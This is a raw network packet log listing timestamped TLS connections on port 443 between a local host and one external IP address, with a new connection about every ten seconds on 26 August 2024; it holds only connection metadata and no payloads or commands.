Aug 26, 2024 15:35:54.952040911 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.952102900 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.952133894 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.952297926 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.952364922 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.952569008 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.952616930 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.952752113 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.952990055 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.953217030 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.953223944 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.953282118 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.953325987 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.953344107 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.953442097 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.013278008 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.013400078 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.013720036 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.014059067 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.014122963 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.230519056 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.230643988 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.230988026 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.231000900 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.231080055 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.231091022 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.482888937 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483113050 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.483212948 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483375072 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.483386040 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483416080 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483603001 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.483632088 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483807087 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.483890057 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.483928919 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:05.484050035 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.484093904 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.484093904 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.793018103 CEST	49839	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:05.793097019 CEST	443	49839	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:15.542022943 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.542130947 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:15.542332888 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.542561054 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.542624950 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:15.759529114 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:15.759802103 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.760098934 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.760114908 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:15.760201931 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:15.760211945 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.007673025 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.007833004 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.007898092 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.008039951 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.008040905 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.008074045 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.008411884 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.008460999 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.008516073 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:16.008765936 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.008765936 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.008765936 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.322004080 CEST	49840	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:16.322102070 CEST	443	49840	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.039865971 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.039993048 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.040220022 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.040426016 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.040488958 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.264555931 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.264834881 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.265145063 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.265192986 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.265213013 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.265235901 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.512546062 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.512747049 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.512804985 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.512835979 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.512974024 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.512974024 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.513039112 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.513289928 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.513345003 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.513550997 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:26.513554096 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.513675928 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.513742924 CEST	49841	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:26.513807058 CEST	443	49841	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:36.552912951 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.553025007 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:36.553248882 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.553370953 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.553440094 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:36.769701958 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:36.770281076 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.770826101 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.770858049 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:36.770875931 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:36.770886898 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.019927025 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020205975 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020210028 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.020287991 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020420074 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.020560026 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020566940 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.020596981 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020829916 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.020885944 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.020925045 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:37.021070004 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.021070957 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.333090067 CEST	49842	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:37.333208084 CEST	443	49842	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.050842047 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.050965071 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.051192045 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.051395893 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.051474094 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.267535925 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.267779112 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.268100023 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.268111944 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.268121004 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.268129110 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.515677929 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.515882969 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.515969038 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.516118050 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.516159058 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.516401052 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.516441107 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.516634941 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.516669035 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.516776085 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:47.516884089 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.516933918 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.516935110 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.830859900 CEST	49843	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:47.830930948 CEST	443	49843	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:57.548445940 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.548568964 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:57.548794985 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.548989058 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.549062014 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:57.773154974 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:57.773288012 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.773686886 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.773756027 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:57.773780107 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:57.773807049 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.028561115 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.028759003 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.028841019 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.028990984 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.029041052 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.029241085 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.029278040 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.029485941 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.029540062 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.029887915 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.030335903 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.030497074 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.030539989 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.030555964 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.030620098 CEST	443	49844	172.67.207.219	192.168.11.20
Aug 26, 2024 15:36:58.030757904 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:36:58.030759096 CEST	49844	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.061908007 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.062007904 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.062346935 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.062556982 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.062627077 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.283468008 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.283735037 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.284109116 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.284121990 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.284156084 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.284163952 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.534713984 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.534878016 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.534943104 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535099030 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535155058 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535345078 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535348892 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535396099 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535500050 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535552979 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535588980 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535722971 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535757065 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535824060 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:08.535861015 CEST	443	49845	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:08.535881042 CEST	49845	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.575196981 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.575305939 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:18.575539112 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.575722933 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.575781107 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:18.796360016 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:18.796577930 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.796936035 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.796947956 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:18.796958923 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:18.796969891 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.045856953 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046015978 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046149015 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.046202898 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046226978 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.046233892 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046384096 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.046437979 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046633959 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.046685934 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046719074 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:19.046840906 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.046951056 CEST	49846	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:19.047010899 CEST	443	49846	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.088449955 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.088593006 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.088781118 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.089019060 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.089087009 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.308717966 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.308928013 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.309240103 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.309288979 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.309340954 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.309391975 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555058956 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555295944 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.555299997 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555366039 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555469036 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.555521011 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.555561066 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555720091 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.555762053 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.555998087 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.556049109 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.556126118 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:29.556212902 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.556287050 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.556365013 CEST	49847	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:29.556426048 CEST	443	49847	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:39.617515087 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.617619038 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:39.617784977 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.618092060 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.618164062 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:39.837013960 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:39.837269068 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.837558985 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.837591887 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:39.837666988 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:39.837709904 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.083800077 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.083987951 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.084054947 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084096909 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084229946 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.084326982 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084476948 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.084549904 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084682941 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.084765911 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084884882 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.084949017 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.084990025 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.085010052 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.085058928 CEST	443	49848	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:40.085086107 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.085087061 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:40.085228920 CEST	49848	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.146574020 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.146697998 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.146923065 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.147161961 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.147227049 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.367371082 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.367564917 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.367889881 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.367908955 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.368033886 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.368048906 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.616703987 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.616920948 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.617007017 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.617227077 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.617253065 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.617288113 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.617444992 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.617494106 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.617706060 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.617714882 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:37:50.617902040 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.617959023 CEST	49849	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:37:50.618006945 CEST	443	49849	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:00.644421101 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.644526958 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:00.644870043 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.645214081 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.645277977 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:00.863935947 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:00.864084005 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.864422083 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.864437103 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:00.865046978 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:00.865061045 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116287947 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116462946 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116470098 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.116552114 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116641998 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.116722107 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116733074 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.116772890 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.116978884 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.116997004 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:01.117124081 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.117225885 CEST	49850	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:01.117295027 CEST	443	49850	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.141850948 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.141875982 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.142080069 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.142267942 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.142280102 CEST	443	49851	172.67.207.219	192.168.11.20
